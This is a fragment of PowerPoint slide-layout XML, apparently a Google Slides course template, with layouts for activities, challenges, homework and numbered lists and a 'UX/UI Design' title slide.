          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2021" name="Google Shape;2021;p10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2022" name="Google Shape;2022;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143971" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2023" name="Google Shape;2023;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25" y="411400"/>
            <a:ext cx="91440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2024" name="Google Shape;2024;p102"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="1468500"/>
            <a:ext cx="45330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11. Activity">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 91"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92" name="Google Shape;92;p12"/>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93" name="Google Shape;93;p12"/>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4" name="Google Shape;94;p12"/>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95" name="Google Shape;95;p12"/>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 name="Google Shape;96;p12"/>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7" name="Google Shape;97;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="39"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899000" y="1133363"/>
            <a:ext cx="1737360" cy="1911096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Google Shape;98;p1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99" name="Google Shape;99;p12"/>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100" name="Google Shape;100;p12"/>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1" name="Google Shape;101;p12"/>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12. Activity with Instructions ">
  <p:cSld name="CUSTOM_2_5_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 102"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Google Shape;103;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="39"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8275625" y="4154800"/>
            <a:ext cx="594361" cy="653795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p1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05" name="Google Shape;105;p1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06" name="Google Shape;106;p1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7" name="Google Shape;107;p1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8" name="Google Shape;108;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p1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10" name="Google Shape;110;p13"/>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1" name="Google Shape;111;p13"/>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3. Challenge">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 112"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Google Shape;113;p14"/>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14" name="Google Shape;114;p14"/>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5" name="Google Shape;115;p14"/>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16" name="Google Shape;116;p1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17" name="Google Shape;117;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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8" name="Google Shape;118;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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9" name="Google Shape;119;p14"/>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120" name="Google Shape;120;p14"/>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21" name="Google Shape;121;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="-595025"/>
            <a:ext cx="2950353" cy="514350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14. Challenge with Instructions">
  <p:cSld name="CUSTOM_2_5_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 122"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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4" name="Google Shape;124;p1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25" name="Google Shape;125;p1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26" name="Google Shape;126;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>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127" name="Google Shape;127;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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8" name="Google Shape;128;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>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29" name="Google Shape;129;p1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30" name="Google Shape;130;p15"/>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31" name="Google Shape;131;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8213200" y="3862850"/>
            <a:ext cx="656773" cy="1144971"/>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15. Homework">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 132"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="Google Shape;133;p16"/>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34" name="Google Shape;134;p16"/>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5" name="Google Shape;135;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="209" r="209"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858369" y="1097625"/>
            <a:ext cx="1737361" cy="1980591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p16"/>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7" name="Google Shape;137;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062160" y="3975150"/>
            <a:ext cx="548640" cy="725893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p1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39" name="Google Shape;139;p16"/>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0" name="Google Shape;140;p16"/>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Due Date:</a:t>
            </a:r>
            <a:endParaRPr sz="1300" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p16"/>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2" name="Google Shape;142;p16"/>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1800">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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16. Homework with Instructions">
  <p:cSld name="CUSTOM_2_5_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 143"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>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145" name="Google Shape;145;p1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46" name="Google Shape;146;p1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pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Google Shape;147;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="504" r="504"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257069" y="4200875"/>
            <a:ext cx="548641" cy="624077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p1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9" name="Google Shape;149;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>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50" name="Google Shape;150;p1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51" name="Google Shape;151;p17"/>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2" name="Google Shape;152;p17"/>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5005">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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17. Numbered 1–4 (Green)">
  <p:cSld name="CUSTOM_2_7_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 153"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p18"/>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6" name="Google Shape;156;p1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57" name="Google Shape;157;p1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58" name="Google Shape;158;p1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59" name="Google Shape;159;p1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60" name="Google Shape;160;p1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61" name="Google Shape;161;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162" name="Google Shape;162;p18"/>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63" name="Google Shape;163;p18"/>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 name="Google Shape;164;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="165" name="Google Shape;165;p18"/>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66" name="Google Shape;166;p18"/>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7" name="Google Shape;167;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="168" name="Google Shape;168;p18"/>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69" name="Google Shape;169;p18"/>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0" name="Google Shape;170;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="171" name="Google Shape;171;p18"/>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72" name="Google Shape;172;p18"/>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3" name="Google Shape;173;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="13980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4" name="Google Shape;174;p18"/>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8"/>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8"/>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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2233538"/>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8" name="Google Shape;178;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3076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9" name="Google Shape;179;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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18. Numbered 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 180"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p19"/>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3" name="Google Shape;183;p1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84" name="Google Shape;184;p1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85" name="Google Shape;185;p1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86" name="Google Shape;186;p1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87" name="Google Shape;187;p1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88" name="Google Shape;188;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1300225"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="189" name="Google Shape;189;p19"/>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90" name="Google Shape;190;p19"/>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1" name="Google Shape;191;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2000125"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="192" name="Google Shape;192;p19"/>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93" name="Google Shape;193;p19"/>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 name="Google Shape;194;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2692850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195" name="Google Shape;195;p19"/>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96" name="Google Shape;196;p19"/>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 name="Google Shape;197;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3390350"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="198" name="Google Shape;198;p19"/>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99" name="Google Shape;199;p19"/>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0" name="Google Shape;200;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7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1" name="Google Shape;201;p19"/>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9"/>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19"/>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19"/>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5" name="Google Shape;205;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2695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6" name="Google Shape;206;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="33855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07" name="Google Shape;207;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="469500" y="4083075"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208" name="Google Shape;208;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="134F5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09" name="Google Shape;209;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="134F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0" name="Google Shape;210;p19"/>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9"/>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19. Numbered 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 212"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p20"/>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15" name="Google Shape;215;p2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16" name="Google Shape;216;p2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17" name="Google Shape;217;p2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18" name="Google Shape;218;p2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19" name="Google Shape;219;p2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20" name="Google Shape;220;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="221" name="Google Shape;221;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22" name="Google Shape;222;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3" name="Google Shape;223;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="1274650"/>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24" name="Google Shape;224;p20"/>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5" name="Google Shape;225;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="226" name="Google Shape;226;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27" name="Google Shape;227;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8" name="Google Shape;228;p20"/>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9" name="Google Shape;229;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="230" name="Google Shape;230;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31" name="Google Shape;231;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2" name="Google Shape;232;p20"/>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3" name="Google Shape;233;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="234" name="Google Shape;234;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35" name="Google Shape;235;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6" name="Google Shape;236;p20"/>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7" name="Google Shape;237;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="238" name="Google Shape;238;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39" name="Google Shape;239;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0" name="Google Shape;240;p20"/>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1" name="Google Shape;241;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="242" name="Google Shape;242;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43" name="Google Shape;243;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4" name="Google Shape;244;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="18488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5" name="Google Shape;245;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="24399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6" name="Google Shape;246;p20"/>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7" name="Google Shape;247;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="3622088"/>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8" name="Google Shape;248;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="4236125"/>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2. Title Slide: UX/UI Design">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 17"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Google Shape;18;p3"/>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19" name="Google Shape;19;p3"/>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UX/UI Design</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Google Shape;21;p3"/>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22" name="Google Shape;22;p3"/>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 name="Google Shape;23;p3"/>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 name="Google Shape;24;p3"/>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25" name="Google Shape;25;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="584735" y="1058550"/>
            <a:ext cx="2560322" cy="1920238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;26;p3"/>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20. Numbered 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 249"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
